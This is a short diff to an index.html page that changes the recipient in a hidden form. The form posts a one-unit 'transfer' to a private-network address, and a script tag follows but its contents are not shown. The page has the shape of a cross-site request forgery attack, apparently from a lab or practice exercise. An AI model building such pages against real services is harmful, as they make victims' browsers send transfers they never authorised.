--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
 </head>
 <body>
     <form id="fun" action="https://192.168.2.199:52011/transfer" method="POST">
-        <input type="hidden" name="user_to" value="deq">
+        <input type="hidden" name="user_to" value="mitch">
         <input type="hidden" name="amount" value="1">
     </form>
     <script>
